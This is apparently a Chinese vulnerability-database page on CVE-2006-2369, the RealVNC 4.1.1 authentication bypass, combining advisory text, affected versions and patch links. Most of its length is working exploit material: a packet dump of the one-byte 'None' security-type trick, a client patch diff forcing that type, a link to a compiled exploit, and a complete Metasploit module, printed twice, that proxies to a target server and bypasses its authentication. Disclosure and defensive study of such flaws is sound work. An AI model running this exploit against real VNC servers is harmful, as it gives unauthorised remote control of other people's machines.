CVE-2006-2369
CVSS7.5
发布时间 :2006-05-15 12:06:00
修订时间 :2016-10-17 23:39:51
NMCOEPS    

[原文]RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.


[CNNVD]RealVNC RFB协议 远程认证绕过漏洞(CNNVD-200605-290)

        RealVNC VNC Server是一款远程终端控制软件
        RealVNC VNC Server采用的RFB(远程帧缓冲区)协议允许客户端与服务端协商合适的认证方法,协议的实现上存在设计错误,远程攻击者可以绕过认证无需口令实现对服务器的访问。
        具体操作细节如下:
        1) 服务端发送其版本"RFB 003.008\n"
        2) 客户端回复其版本"RFB 003.008\n"
        3) 服务端发送1个字节,等于所提供安全类型的编号
        3a) 服务端发送字节数组说明所提供的安全类型
        4) 客户端回复1个字节,从3a的数组中选择安全类型
        5) 如果需要的话执行握手,然后是服务端的"0000"
        RealVNC 4.1.1或之前版本在实现RFB 003.008协议时没有检查判断在上面第4步中客户端所发送的字节是否为服务器在3a步中所提供的,因此认证就从服务端转移到了客户端。攻击者可以强制客户端请求"Type 1 - None"为安全类型,无需口令字段便可以访问服务器。
        以下是典型的报文dump:
        Server -> Client: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Server version
        Client -> Server: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Client version
        Server -> Client: 01 02 <- One field follows... and that field is 02
        (DES Challenge)
        Client -> Server: 01 <- Ahh, the lovely 1 byte exploit! Beautiful, isn't it?
        Server -> Client: 00 00 00 00 <-- Authenticated!
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-287 [认证机制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2369
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2369
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-290
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=full-disclosure&m=114768344111131&w=2
(UNKNOWN)  FULLDISC  20060515 RealVNC 4.1.1 Remote Compromise
http://marc.info/?l=vnc-list&m=114755444130188&w=2
(UNKNOWN)  MLIST  [vnc-list] 20060513 Version 4.1.2
http://securityreason.com/securityalert/8355
(UNKNOWN)  SREASON  8355
http://securitytracker.com/id?1016083
(PATCH)  SECTRACK  1016083
http://www.cisco.com/warp/public/707/cisco-sr-20060622-cmm.shtml
(UNKNOWN)  CISCO  20060622 RealVNC Remote Authentication Bypass Vulnerability
http://www.intelliadmin.com/blog/2006/05/security-flaw-in-realvnc-411.html
(UNKNOWN)  MISC  http://www.intelliadmin.com/blog/2006/05/security-flaw-in-realvnc-411.html
http://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.html
(PATCH)  MISC  http://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.html
http://www.kb.cert.org/vuls/id/117929
(VENDOR_ADVISORY)  CERT-VN  VU#117929
http://www.realvnc.com/products/free/4.1/release-notes.html
(PATCH)  CONFIRM  http://www.realvnc.com/products/free/4.1/release-notes.html
http://www.securityfocus.com/archive/1/archive/1/433994/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060515 RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/434015/100/0/threaded
(PATCH)  BUGTRAQ  20060515 Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/434117/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060516 re: RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/434518/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060518 RE: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/434560/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060520 Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
http://www.securityfocus.com/archive/1/archive/1/438175/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060623 Linux VNC evil client patch - BID 17978
http://www.securityfocus.com/archive/1/archive/1/438368/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060624 Re: Linux VNC evil client patch - BID 17978
http://www.securityfocus.com/bid/17978
(PATCH)  BID  17978
http://www.vupen.com/english/advisories/2006/1790
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1790
http://www.vupen.com/english/advisories/2006/1821
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1821
http://www.vupen.com/english/advisories/2006/2492
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2492
http://xforce.iss.net/xforce/xfdb/26445
(UNKNOWN)  XF  realvnc-auth-bypass(26445)

- 漏洞信息

RealVNC RFB协议 远程认证绕过漏洞
高危 授权问题
2006-05-15 00:00:00 2006-11-30 00:00:00
远程  
        RealVNC VNC Server是一款远程终端控制软件
        RealVNC VNC Server采用的RFB(远程帧缓冲区)协议允许客户端与服务端协商合适的认证方法,协议的实现上存在设计错误,远程攻击者可以绕过认证无需口令实现对服务器的访问。
        具体操作细节如下:
        1) 服务端发送其版本"RFB 003.008\n"
        2) 客户端回复其版本"RFB 003.008\n"
        3) 服务端发送1个字节,等于所提供安全类型的编号
        3a) 服务端发送字节数组说明所提供的安全类型
        4) 客户端回复1个字节,从3a的数组中选择安全类型
        5) 如果需要的话执行握手,然后是服务端的"0000"
        RealVNC 4.1.1或之前版本在实现RFB 003.008协议时没有检查判断在上面第4步中客户端所发送的字节是否为服务器在3a步中所提供的,因此认证就从服务端转移到了客户端。攻击者可以强制客户端请求"Type 1 - None"为安全类型,无需口令字段便可以访问服务器。
        以下是典型的报文dump:
        Server -> Client: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Server version
        Client -> Server: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Client version
        Server -> Client: 01 02 <- One field follows... and that field is 02
        (DES Challenge)
        Client -> Server: 01 <- Ahh, the lovely 1 byte exploit! Beautiful, isn't it?
        Server -> Client: 00 00 00 00 <-- Authenticated!
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.realvnc.com/download.html

- 漏洞信息 (1791)

RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Auth Bypass Patch/EXE (EDBID:1791)
multiple remote
2006-05-16 Verified
5900 redsand
N/A [点击下载]
xx  vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
--- vnc-4_1_1-unixsrc/common/rfb/CConnection.cxx        2005-03-11 09:08:41.000000000 -0600
+++ vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx  2006-05-15 14:03:30.000000000 -0500
@@ -183,7 +183,12 @@

     // Inform the server of our decision
     if (secType != secTypeInvalid) {
-      os->writeU8(secType);
+
+      // [BL4CK] In response to the VNC Null Authentication
+      // force a secType to equal secTypeNone
+      // http://blacksecurity.org
+      secType = secTypeNone;
+      os->writeU8(secTypeNone);
       os->flush();
       vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType);     }

Compiled: http://www.exploit-db.com/sploits/05162006-BL4CK-vncviewer-authbypass.rar


		

- 漏洞信息 (17719)

RealVNC Authentication Bypass (EDBID:17719)
windows remote
2011-08-26 Verified
0 metasploit
N/A [点击下载]
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary
	include Msf::Exploit::Remote::Tcp
	
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'RealVNC Authentication Bypass',
			'Description'    => %q{
				This module exploits an Authentication Bypass Vulnerability
				in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
				listener on LPORT and proxies to the target server

				The AUTOVNC option requires that vncviewer be installed on 
				the attacking machine. This option should be disabled for Pro
			},
			'Author'         => 
				[
					'hdm', #original msf2 module
					'TheLightCosine <thelightcosine[at]gmail.com>'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13641 $',
			'References'     =>
				[
					['BID', '17978'],
					['OSVDB', '25479'],
					['URL', 'http://secunia.com/advisories/20107/'],
					['CVE', 'CVE-2006-2369'],
				],
			'DisclosureDate' => 'May 15 2006'))

		register_options(
			[
				OptAddress.new('RHOST', [true, 'The Target Host']),
				OptPort.new('RPORT',    [true, "The port the target VNC Server is listening on", 5900 ]),
				OptPort.new('LPORT',    [true, "The port the local VNC Proxy should listen on", 5900 ]),
				OptBool.new('AUTOVNC',  [true, "Automatically Launch vncviewer from this host", true])
			], self.class)
	end

	def run
		#starts up the Listener Server
		print_status("starting listener")
		listener = Rex::Socket::TcpServer.create(
				'LocalHost' => '0.0.0.0',
				'LocalPort' => datastore['LPORT'],
				'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
			)

		#If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine
		#targetting the proxy listener.
		if (datastore['AUTOVNC'])
			unless (check_vncviewer())
				print_error("vncviewer does not appear to be installed, exiting!!!")
				return nil
			end
			print_status("Spawning viewer thread")	
			view = framework.threads.spawn("VncViewerWrapper", false) {
					system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
			}
		end

		#Establishes the connection between the viewier and the remote server
		client = listener.accept
		add_socket(client)

		s = Rex::Socket::Tcp.create(
				'PeerHost' => datastore['RHOST'],
				'PeerPort' => datastore['RPORT'],
				'Timeout' => 1
				)
		add_socket(s)
		serverhello = s.gets
		unless serverhello.include? "RFB 003.008"
			print_error("The VNCServer is not vulnerable")
			return
		end

		#MitM attack on the VNC Authentication Process
		client.puts(serverhello)
		clienthello = client.gets
		s.puts(clienthello)
		authmethods = s.recv(2)
		print_status("Auth Methods Recieved. Sending Null Authentication Option to Client")
		client.write("\x01\x01")
		client.recv(1)
		s.write("\x01")
		s.recv(4)
		client.write("\x00\x00\x00\x00")

		#handles remaining proxy operations between the two sockets
		closed = false
		while(closed == false)
			sockets =[]
			sockets << client
			sockets << s
			selected = select(sockets,nil,nil,0)
			#print_status ("Selected: #{selected.inspect}")
			unless selected.nil?
				if selected[0].include?(client)
					#print_status("Transfering from client to server")
					begin
						data = client.sysread(8192)
						if data.nil?
							print_error("Client Closed Connection")
							closed = true
						else
							s.write(data)
						end
					rescue
						print_error("Client Closed Connection")	
						closed = true
					end
				end
				if selected[0].include?(s)
					#print_status("Transfering from server to client")
					begin
						data = s.sysread(8192)
						if data.nil?
							print_error("Server Closed Connection")
							closed = true
						else
							client.write(data)
						end
					rescue
						closed = true
					end
				end
			end
		end

		#Garbage Collection
		s.close
		client.close
		print_status("Listener Closed")

		if (datastore['AUTOVNC'])
			view.kill
			print_status("Viewer Closed")
		end
	end

	def check_vncviewer
		vnc =
			Rex::FileUtils::find_full_path('vncviewer') ||
			Rex::FileUtils::find_full_path('vncviewer.exe')
		if (vnc)
			return true
		else
			return false
		end
	end
end
		

- 漏洞信息 (F104471)

RealVNC Authentication Bypass (PacketStormID:F104471)
2011-08-26 00:00:00
H D Moore,The Light Cosine  metasploit.com
exploit,bypass
CVE-2006-2369,OSVDB-25479
[点击下载]

This Metasploit module exploits an Authentication Bypass Vulnerability in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy listener on LPORT and proxies to the target server The AUTOVNC option requires that vncviewer be installed on the attacking machine. This option should be disabled for Pro.

##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary
	include Msf::Exploit::Remote::Tcp
	
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'RealVNC Authentication Bypass',
			'Description'    => %q{
				This module exploits an Authentication Bypass Vulnerability
				in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
				listener on LPORT and proxies to the target server

				The AUTOVNC option requires that vncviewer be installed on 
				the attacking machine. This option should be disabled for Pro
			},
			'Author'         => 
				[
					'hdm', #original msf2 module
					'TheLightCosine <thelightcosine[at]gmail.com>'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13641 $',
			'References'     =>
				[
					['BID', '17978'],
					['OSVDB', '25479'],
					['URL', 'http://secunia.com/advisories/20107/'],
					['CVE', 'CVE-2006-2369'],
				],
			'DisclosureDate' => 'May 15 2006'))

		register_options(
			[
				OptAddress.new('RHOST', [true, 'The Target Host']),
				OptPort.new('RPORT',    [true, "The port the target VNC Server is listening on", 5900 ]),
				OptPort.new('LPORT',    [true, "The port the local VNC Proxy should listen on", 5900 ]),
				OptBool.new('AUTOVNC',  [true, "Automatically Launch vncviewer from this host", true])
			], self.class)
	end

	def run
		#starts up the Listener Server
		print_status("starting listener")
		listener = Rex::Socket::TcpServer.create(
				'LocalHost' => '0.0.0.0',
				'LocalPort' => datastore['LPORT'],
				'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
			)

		#If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine
		#targetting the proxy listener.
		if (datastore['AUTOVNC'])
			unless (check_vncviewer())
				print_error("vncviewer does not appear to be installed, exiting!!!")
				return nil
			end
			print_status("Spawning viewer thread")	
			view = framework.threads.spawn("VncViewerWrapper", false) {
					system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
			}
		end

		#Establishes the connection between the viewier and the remote server
		client = listener.accept
		add_socket(client)

		s = Rex::Socket::Tcp.create(
				'PeerHost' => datastore['RHOST'],
				'PeerPort' => datastore['RPORT'],
				'Timeout' => 1
				)
		add_socket(s)
		serverhello = s.gets
		unless serverhello.include? "RFB 003.008"
			print_error("The VNCServer is not vulnerable")
			return
		end

		#MitM attack on the VNC Authentication Process
		client.puts(serverhello)
		clienthello = client.gets
		s.puts(clienthello)
		authmethods = s.recv(2)
		print_status("Auth Methods Recieved. Sending Null Authentication Option to Client")
		client.write("\x01\x01")
		client.recv(1)
		s.write("\x01")
		s.recv(4)
		client.write("\x00\x00\x00\x00")

		#handles remaining proxy operations between the two sockets
		closed = false
		while(closed == false)
			sockets =[]
			sockets << client
			sockets << s
			selected = select(sockets,nil,nil,0)
			#print_status ("Selected: #{selected.inspect}")
			unless selected.nil?
				if selected[0].include?(client)
					#print_status("Transfering from client to server")
					begin
						data = client.sysread(8192)
						if data.nil?
							print_error("Client Closed Connection")
							closed = true
						else
							s.write(data)
						end
					rescue
						print_error("Client Closed Connection")	
						closed = true
					end
				end
				if selected[0].include?(s)
					#print_status("Transfering from server to client")
					begin
						data = s.sysread(8192)
						if data.nil?
							print_error("Server Closed Connection")
							closed = true
						else
							client.write(data)
						end
					rescue
						closed = true
					end
				end
			end
		end

		#Garbage Collection
		s.close
		client.close
		print_status("Listener Closed")

		if (datastore['AUTOVNC'])
			view.kill
			print_status("Viewer Closed")
		end
	end

	def check_vncviewer
		vnc =
			Rex::FileUtils::find_full_path('vncviewer') ||
			Rex::FileUtils::find_full_path('vncviewer.exe')
		if (vnc)
			return true
		else
			return false
		end
	end
end
    

- 漏洞信息

25479
RealVNC Security Type Enforcement Failure Remote Authentication Bypass
Remote / Network Access Authentication Management
Loss of Confidentiality
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

RealVNC contains a flaw that may allow a malicious user to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password. The issue is triggered due to an error within the handling of VNC password authentication requests. This flaw may lead to a loss of confidentiality.

- 时间线

2006-05-15 Unknow
2006-05-15 Unknow

- 解决方案

Upgrade to version 4.1.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

RealVNC Remote Authentication Bypass Vulnerability
Design Error 17978
Yes No
2006-05-15 12:00:00 2007-11-15 12:36:00
Steve Wiseman discovered this vulnerability.

- 受影响的程序版本

RealVNC RealVNC Personal Edition 4.2.2
RealVNC RealVNC Personal Edition 4.2
RealVNC RealVNC Personal Edition 4.1
RealVNC RealVNC Personal Edition 4.0
RealVNC RealVNC Free Edition 4.1.1
RealVNC RealVNC Free Edition 4.1
RealVNC RealVNC Free Edition 4.0
RealVNC RealVNC Enterprise Edition 4.2.2
RealVNC RealVNC Enterprise Edition 4.2
RealVNC RealVNC Enterprise Edition 4.1
RealVNC RealVNC Enterprise Edition 4.0
Cisco IP/VC 3540/DCS 0
RealVNC RealVNC Personal Edition 4.2.3
RealVNC RealVNC Free Edition 4.1.2
RealVNC RealVNC Enterprise Edition 4.2.3

- 不受影响的程序版本

RealVNC RealVNC Personal Edition 4.2.3
RealVNC RealVNC Free Edition 4.1.2
RealVNC RealVNC Enterprise Edition 4.2.3

- 漏洞讨论

RealVNC is susceptible to an authentication-bypass vulnerability. This issue is due to a flaw in the authentication process of the affected package.

Exploiting this issue allows attackers to gain unauthenticated, remote access to the VNC servers.

RealVNC 4.1.1 is vulnerable to this issue; other versions may also be affected.

UPDATE (May 25, 2006): Reports indicate that this issue is being actively exploited in the wild.

- 漏洞利用

To exploit this issue, attackers will likely modify readily available open-source VNC client software.

Exploit code is available by the reporter of this issue. It is not currently known to be publicly available.

HD Moore has provided an example using the Metasploit Framework. BL4CK has supplied a patch to VNC 4.1.1 to exploit this issue.

A scanner application is available by ad@heapoverflow.com. Note that Symantec has neither tested this scanner application nor verified it to be safe. Please see the references for more information.

A multi-threaded scanner application based on the ad@heapoverflow.com version is available from Matt Venzke. Note that Symantec has neither tested this scanner application nor verified it to be safe.

embyte has supplied a patch to VNC 4.1.1 to exploit this issue.

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

The vendor has released fixes to address this issue.


RealVNC RealVNC Enterprise Edition 4.1

RealVNC RealVNC Free Edition 4.1

RealVNC RealVNC Personal Edition 4.1

RealVNC RealVNC Enterprise Edition 4.0

Cisco IP/VC 3540/DCS 0

RealVNC RealVNC Free Edition 4.0

RealVNC RealVNC Personal Edition 4.0

RealVNC RealVNC Free Edition 4.1.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站